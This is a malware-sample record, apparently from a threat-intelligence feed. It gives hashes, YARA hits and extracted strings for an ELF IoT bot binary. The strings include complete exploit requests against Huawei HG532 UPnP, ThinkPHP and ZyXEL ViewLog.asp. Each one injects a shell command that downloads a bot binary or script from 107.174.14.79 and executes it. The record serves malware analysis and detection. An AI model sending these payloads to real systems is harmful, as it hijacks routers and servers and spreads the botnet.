Sample details: a42a43d60a1e45fa72e7a7e924efd96d --

Hashes
MD5: a42a43d60a1e45fa72e7a7e924efd96d
SHA1: e6fb0bd593bd09685454431ac6baaeef3b57923c
SHA256: 6abbd285b112542f9cbdc982c603f16d1009fea3afeb3159fb7cbef946b2223b
SSDEEP: 1536:EiqvoMDZVZWJpqZhPOnAiHhwt2/mYWgaX+tSYK1Kf5Pj3Qp:EiqvoMdVZWJpqzPchhk2/mYPautE1Kf2
Details
File Type: ELF
Added: 2019-06-20 00:06:00
Yara Hits
YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1 |
Source
http://107.174.14.79/bins/UnHAnaAW.x86
Strings
		PTRh&c
D$ j@j
\$H9\$
D$$j@j
;|$(t:PPj
;|$(t:PPj
D$(j@j
D$ j@j
< t <	t
C)QQWP
D$ JR**
D$(XZj
D$(_]j
f;D$4u
9D$ t'
f;D$@u
f;D$4u
;T$(}Q
D$$PSV
f;D$4u
xAPPSh
\$0PPj
D$,PhD
}/C;T$
u%WWSS
PPShxm
t@;D$xu
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 107.174.14.79 -l /tmp/binary -r /bins/UnHAnaAW.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Selfrep.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
107.174.14.79
<!: acam
 18:1 
0125!8 
$5''#;&0
'!$$;& 
?;d509=:
:217 10t
'<188T
1:5681T
'-' 19T
{6=:{6!'-6;,t
nt5$$81 t:; t2;!:0T
:7;&&17 T
{6=:{6!'-6;,t$'T
{6=:{6!'-6;,t?=88tymtT
{$&;7{T
{95$'T
{$&;7{:1 { 7$T
{' 5 !'T
z5:=91T
{$&;7{:1 {&;! 1T
5''#;&0T
{1 7{&1';8"z7;:2T
:591'1&"1&tT
{01"{#5 7<0;3T
{01"{9='7{#5 7<0;3T
$662*7!E
1: 1&T
e365`70;9ag:<$ef1=d?2>T
;!&71t
:3=:1t
GET /index.php?s=/index/	hink
pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://107.174.14.79/bins/UnHAnaAW.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Uirusu/2.0
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
 /bin/busybox wget http://107.174.14.79/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors